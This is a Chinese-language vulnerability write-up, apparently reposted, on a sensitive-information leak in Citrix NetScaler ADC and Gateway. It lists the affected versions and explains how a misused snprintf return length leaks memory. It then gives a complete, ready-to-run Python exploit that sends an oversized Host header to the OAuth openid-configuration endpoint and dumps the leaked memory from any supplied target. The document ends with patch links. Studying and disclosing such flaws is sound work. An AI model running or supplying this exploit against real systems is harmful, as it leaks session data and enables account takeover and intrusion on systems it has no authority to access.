1.漏洞形貌
Citrix Systems Citrix NetScaler Gateway(Citrix Systems Gateway)和Citrix Systems NetScaler ADC都是美国思杰体系(Citrix Systems)公司的产品。
NetScaler ADC和NetScaler Gateway存在安全漏洞,该漏洞源于存在敏感信息泄露。
2.影响版本
- NetScaler ADC and NetScaler Gateway 14.1 < 14.1-8.50
- NetScaler ADC and NetScaler Gateway 13.1 < 13.1-49.15
- NetScaler ADC and NetScaler Gateway 13.0 < 13.0-92.19
- NetScaler ADC 13.1-FIPS < 13.1-37.164
- NetScaler ADC 12.1-FIPS < 12.1-55.300
- NetScaler ADC 12.1-NDcPP < 12.1-55.300
3.影响范围
4.漏洞分析
- 这里以 13.0-47 的固件为例子, 从固件拉出 nsppe 这个程序,用 IDA 打开分析。 搜索文章提到的字符串可以看到如下代码:
- snprintf函数被用于将hostname参数拼接到print_temp_rule变量中,并根据返回的长度,通过ns_vpn_send_response函数返回HTTP请求的结果。这种对snprintf的使用方法是一个常见的错误。这里的hostname参数是由 HTTP 请求中的 Host 头决定的,因此这个参数的长度我们是完全可以控制的。
- snprintf 这个函数应该返回的是 ”想要写入buffer 的字符串长度“ , 而不是实际写入buffer的字符长长度。可以从一个 DEMO 看出这个效果:
- 可以看到,当我想写入 16长度的字符串的时候, n2的值为 16, 而不是实际写入的长度。
- 另外到达这个函数的路由,通过对这个函数 ns_aaa_oauth_send_openid_config
- 进行交叉引用一下子就看到了:
- #!/usr/bin/env python3
- import sys
- import requests
- import urllib3
- import argparse
- urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
- parser = argparse.ArgumentParser()
- parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)')
- args = parser.parse_args()
- if args.target is None:
- print('Target must be provided (e.g. --target 192.168.1.200)')
- sys.exit(0)
- hostname = args.target
- if __name__ == "__main__":
- headers = {
- "Host": "a"*24576
- }
- r = requests.get(f"https://{hostname}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)
- if r.status_code == 200:
- print("--- Dumped Memory ---")
- print(r.text[131050:])
- print("--- End ---")
- else:
- print("Could not dump memory")
现在官方已发布安全版本修复此漏洞,建议受影响的用户实时升级防护:
https://www.citrix.com/downloads/citrix-gateway/
https://www.citrix.com/downloads/citrix-adc/
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
